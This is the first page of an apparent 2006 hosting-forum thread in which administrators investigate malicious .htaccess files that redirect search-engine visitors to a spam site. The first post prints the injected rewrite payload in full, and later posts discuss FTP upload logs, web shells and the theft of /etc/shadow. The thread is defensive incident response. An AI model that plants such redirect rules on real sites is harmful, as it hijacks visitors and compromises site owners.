Page 1 of 2 12 LastLast
Results 1 to 40 of 57
  1. #1
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855

    Beware: new .haccess hacking

    Hello

    On one of our serveurs, many websites ended with an .htaccess file with this content:


    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*www.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*
    RewriteRule ^(.*)$ http://vegas.org.ru/go.php?link=1 [R=301,L]



    When people visit the infected website, they redirected to the URL located at the end of the file.

    I am deleted all these files and investigating the matter.

    About server:
    Dual Xeon 2.8/HT
    4 Gb RAM
    CentOs
    Kernel 2.6.18.1 #1 SMP
    PHP 4.4.4
    Apache 1.3.37
    Direct Admin
    No CGI for most users
    register_globals = Off
    Disabled functions: exec,passthru,proc_open,proc_close,shell_exec,system,popen


    Linux is more secure than Windows, give me a break!
    .:. Enterprise SAN Consultant .:.

  2. #2
    Thanks for the heads up. Will be useful to tell others this same thing.
    http://www.sinaihosting.com http://www.sinaidomains.com
    Cheap Webhosting. Buy now and dont pay straight away Save for christmas.
    Merry Christmas btw

  3. #3
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Linux is more secure than Windows, give me a break!
    Co-opting .htaccess in this manner has nothing to do with the Windows vs Linux / Unix debate. Apache runs on both.

    What you've not done is illustrate *how* your machine was compromised.
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  4. #4
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    On 800 domains, about 50 was compromised this way. There nothing common between them. Only the files located at the root of the websites were infected.

    I have all usal tools such as mod_security, apf, bfd... etc
    .:. Enterprise SAN Consultant .:.

  5. #5
    Join Date
    Mar 2005
    Location
    Maine, USA
    Posts
    302
    What were the permissions of the .htaccess files before and after the hack?
    Were there any commonalities between the domains that got hacked, such as php scripts, blogs, CMS, etc?

    edit: looks like you aren't the only one: http://www.castlecops.com/p857082-Site_Compromised.html
    Last edited by jzukerman; 12-14-2006 at 08:00 PM.

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    I actually have been seeing this on other servers. file permissions are correct.

    Check your ftp logs, I have actually seen people upload the htaccess files.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    "0.php"

    Nice. You can find a bittorrent site out there via google with that thing accessible right now. Edit: that was in Google cache. 653 hits returned (mostly the same 3) for a search in Google "networkfilemanagerphp l33t". Installed, it would appear, in various places including "www/icons".
    Last edited by mwatkins; 12-14-2006 at 08:22 PM.
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  8. #8
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    I have found no 0.php file. All .htaccess file had correct permissions.

    One customer complained and that what prompted me to search server wide.

    I have miles of FTP logs with many .htaccess but I can't know if they are related or not.

    I am working on the issue to know how it happened. I am quite sure that this an APACHE expoit. Some websites were just FULL HTML.
    .:. Enterprise SAN Consultant .:.

  9. #9
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by edelweisshosting
    I have found no 0.php file. All .htaccess file had correct permissions.

    One customer complained and that what prompted me to search server wide.

    I have miles of FTP logs with many .htaccess but I can't know if they are related or not.

    I am working on the issue to know how it happened. I am quite sure that this an APACHE expoit. Some websites were just FULL HTML.
    Well we have had the exact same content injected into htaccess via ftp.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  10. #10
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    Could you tell me more please?

    Do you mean that they have got FTP access to all these accounts?

    The servers uses ProFTPd 1.3.0rc2
    .:. Enterprise SAN Consultant .:.

  11. #11
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Might want to do a `grep -i` through *.php in one of the affected clients home directories, looking for "networkfilemanagerphp".

    Doesn't have to be named 0.php.

    And perhaps that's a fork in the trail anyway.
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  12. #12
    Join Date
    Feb 2006
    Location
    Swellyville
    Posts
    2,340
    Good heads up on this, thanks!
    <<< Please see Forum Guidelines for signature setup. >>>

  13. #13
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    find . -name '*.php' -exec egrep 'network' {} /dev/null \;

    gives nothing but:

    I discovered that all infected websites are using phpBB. The infected .htaccess was always one level above installation folder but never on the installation folder itself.
    .:. Enterprise SAN Consultant .:.

  14. #14
    phpbb has been known to have security flaws. If you don't keep updated with the latest packages, then it is quite possible that you were hacked through phpbb. Don't forget the possibility that the culprit is one of your own users.

  15. #15
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Dec 14 15:14:23 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.73KB/sec)
    Dec 14 15:23:23 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.86KB/sec)
    Dec 14 15:23:23 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.83KB/sec)
    Dec 14 15:29:04 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 15.39KB/sec)
    Dec 14 15:29:04 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.67KB/sec)
    Dec 14 15:32:32 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.64KB/sec)
    Dec 14 15:32:33 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.55KB/sec)
    Dec 14 15:42:46 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 14.93KB/sec)
    Dec 14 15:42:46 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.69KB/sec)
    Dec 14 15:43:30 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.40KB/sec)
    Dec 14 15:43:30 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.49KB/sec)
    Dec 14 15:44:55 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.87KB/sec)
    Dec 14 15:44:55 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.80KB/sec)

    that is all different accounts. just recently had it happen again. It has happened on both proftpd and pure-ftpd regardless of changing the password. this is a cpanel box.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  16. #16
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    Impressive!

    Thank you. I am going analyse my logs again.
    .:. Enterprise SAN Consultant .:.

  17. #17
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Quote Originally Posted by Steven
    that is all different accounts. just recently had it happen again. It has happened on both proftpd and pure-ftpd regardless of changing the password. this is a cpanel box.
    Interesting. I use neither. Might keep it that way!
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  18. #18
    Join Date
    Oct 2006
    Location
    uk
    Posts
    448
    its probabbly a cpanel or other exploit.

    pure-ftp is very secure....

  19. #19
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by doc_flabby
    its probabbly a cpanel or other exploit.

    pure-ftp is very secure....

    cpanel exploit? that would mean they would have to obtain the password files and crack the passwords.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  20. #20
    Join Date
    Oct 2006
    Location
    uk
    Posts
    448
    they could have stolen the passwords though cpanel. Via a modified login page.

  21. #21
    Join Date
    Oct 2002
    Location
    State of Disbelief
    Posts
    22,947
    *subscribes to thread*

  22. #22
    Join Date
    Feb 2001
    Location
    West Michigan, USA
    Posts
    9,675
    Its users' compromised scripts that allowed access. Not Linux, cPanel, .htaccess or even the cycles of the moon.

    --Tina
    ||| 99.999% Uptime SLA!!!
    Plenty of space and bandwidth to fit your needs!
    www.AEIandYou.com - - (WP Friendly - Premium Reseller Hosting and Cheap Dedicated Servers)

  23. #23
    Join Date
    Jul 2002
    Posts
    3,729
    Quote Originally Posted by doc_flabby
    they could have stolen the passwords though cpanel. Via a modified login page.
    More likely they compromised some junk php script and used it to grab a copy of /etc/shadow, went off and cracked easy passes, and came back to all the accounts they had been able to crack.

  24. #24
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Andrew
    More likely they compromised some junk php script and used it to grab a copy of /etc/shadow, went off and cracked easy passes, and came back to all the accounts they had been able to crack.

    Question is how did they get /etc/shadow?
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  25. #25
    Quote Originally Posted by AH-Tina
    Its users' compromised scripts that allowed access. Not Linux, cPanel, .htaccess or even the cycles of the moon.

    --Tina
    Making a statement like that is merly your best guess. However, it should have been mentioned as such. Sending users in the wrong direction can be a little frustrating as it is.

    <snipped referral to removed post>
    Last edited by bear; 12-16-2006 at 11:57 AM.

  26. #26
    Join Date
    Jul 2002
    Posts
    3,729
    Quote Originally Posted by Steven
    Question is how did they get /etc/shadow?
    That's the mystery wrapped up in an enigma. Could be any compromisable script that they've found. Even one line of code in some non-commercial script. I know you know this, but I'm trying to quell the 'it's probably Cpanel' people. More than likely it has nothing whatsoever to do with Cpanel.

  27. #27
    Can we please stay on topic?

  28. #28
    Join Date
    Oct 2002
    Location
    State of Disbelief
    Posts
    22,947
    Yes, great idea.
    Cleaned up a bit, please stay on the subject.

  29. #29
    Join Date
    Oct 2006
    Location
    uk
    Posts
    448
    my point really was that as there is no known root exploits for pure-ftp, it is highly unlikely they got the passwords thought the ftp program.

  30. #30
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by doc_flabby
    my point really was that as there is no known root exploits for pure-ftp, it is highly unlikely they got the passwords thought the ftp program.

    I agree with you on that, but there are no known public ones, does not rule out private. (there are a few private ones for proftpd rolling around from what i heard)
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  31. #31
    Join Date
    Feb 2001
    Location
    West Michigan, USA
    Posts
    9,675
    Quote Originally Posted by hbidad
    Making a statement like that is merly your best guess. However, it should have been mentioned as such. Sending users in the wrong direction can be a little frustrating as it is.

    <snipped referral to removed post>

    Yup, I meant to say "probably" - but left that out. My point was really that its probably not a cpanel, Linux or .htaccess exploit.

    Thanks for politely pointing that out.

    --Tina
    ||| 99.999% Uptime SLA!!!
    Plenty of space and bandwidth to fit your needs!
    www.AEIandYou.com - - (WP Friendly - Premium Reseller Hosting and Cheap Dedicated Servers)

  32. #32
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    Quote Originally Posted by Steven
    that is all different accounts. just recently had it happen again. It has happened on both proftpd and pure-ftpd regardless of changing the password. this is a cpanel box.
    Lame, just had a box with the same problem and that same TP IP is still being used... I wonder how many servers have been exploited by it.

    Have not looked too far into it yet but so far all the sites exploited do not run phpbb and this one server was running proftpd.
    Last edited by eth00; 12-16-2006 at 07:03 PM.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  33. #33
    Join Date
    Apr 2002
    Location
    Auckland - New Zealand
    Posts
    1,572
    I remember an old problem with cpanel, where there were temporary shadow files (shadow.tmpeditlib) that were chmod 644! Maybe make sure you don't have anything like that hanging around (thats been fixed for some time btw)

    It does sound like a password cracker has been used here, either that or they have all the user names and the accounts have weak passwords that got brute forced. I guess checking the logs with a fine toothed comb is needed here..

  34. #34
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Dotable Steve
    I remember an old problem with cpanel, where there were temporary shadow files (shadow.tmpeditlib) that were chmod 644! Maybe make sure you don't have anything like that hanging around (thats been fixed for some time btw)

    It does sound like a password cracker has been used here, either that or they have all the user names and the accounts have weak passwords that got brute forced. I guess checking the logs with a fine toothed comb is needed here..
    I thought the same thing with the shadow files. This happened on accounts which I personally changed.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  35. #35
    Join Date
    Mar 2001
    Posts
    1,434
    Proftpd did have a recent exploit for 1.3.0 and lower:
    http://www.securityfocus.com/archive...0/200/threaded

    But this one requires uncommon settings in proftpd to be viable, and then only allows remote code execution, not access to passwords.

    We've noticed a huge increasing trend over the past month of brute force u/p combos not only via ssh (as usual), but pop3, smtp authentication, ftp, etc... And with many exploited php/perl scripts, hackers now just collect /etc/passwd files, then try and brute force the usernames via pop/smtp authentication, etc... to bypass traditional ftp/ssh blocking/bfd style systems. They put the bot armies to work to vary IP's as well, rate limit to get under the bfd radar, etc...

    If anyone has news on an actual proftpd exploit that allows u/p compromises, please tell the proftpd group.

    - John C.

  36. #36
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by JohnCrowley
    Proftpd did have a recent exploit for 1.3.0 and lower:
    http://www.securityfocus.com/archive...0/200/threaded

    But this one requires uncommon settings in proftpd to be viable, and then only allows remote code execution, not access to passwords.

    We've noticed a huge increasing trend over the past month of brute force u/p combos not only via ssh (as usual), but pop3, smtp authentication, ftp, etc... And with many exploited php/perl scripts, hackers now just collect /etc/passwd files, then try and brute force the usernames via pop/smtp authentication, etc... to bypass traditional ftp/ssh blocking/bfd style systems. They put the bot armies to work to vary IP's as well, rate limit to get under the bfd radar, etc...

    If anyone has news on an actual proftpd exploit that allows u/p compromises, please tell the proftpd group.

    - John C.

    I'm just having a hard time accepting its just a brute force because one of the accounts had its password changed to something like: 234$%$ds332*

    and it got hit.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  37. #37
    Join Date
    Apr 2002
    Location
    Auckland - New Zealand
    Posts
    1,572
    Steven,

    Have you checked the permissions on the ftp password files as well?
    With a strong password like that, it would take eons to crack, how soon after changing did it get hit?

    Was the password changed or was that one that you set, still used?

  38. #38
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Dotable Steve
    Steven,

    Have you checked the permissions on the ftp password files as well?
    With a strong password like that, it would take eons to crack, how soon after changing did it get hit?

    Was the password changed or was that one that you set, still used?

    Yes, the permissions were correct, that is one thing I checked right away. After changing the password, it took about a week to get hit again.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  39. #39
    Join Date
    Apr 2002
    Location
    Auckland - New Zealand
    Posts
    1,572
    Quote Originally Posted by Steven
    Yes, the permissions were correct, that is one thing I checked right away. After changing the password, it took about a week to get hit again.
    That sounds nasty.. did you check to see if the password had been changed at all?

    Just wondering if there is a hole allowing passwords to get reset or something, maybe someone intercepted a password reset email, I won't go into details there, but something to check maybe if there were any attempts of anything like that.

  40. #40
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Dotable Steve
    That sounds nasty.. did you check to see if the password had been changed at all?

    Just wondering if there is a hole allowing passwords to get reset or something, maybe someone intercepted a password reset email, I won't go into details there, but something to check maybe if there were any attempts of anything like that.

    You know what Steve, I have not check that yet.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •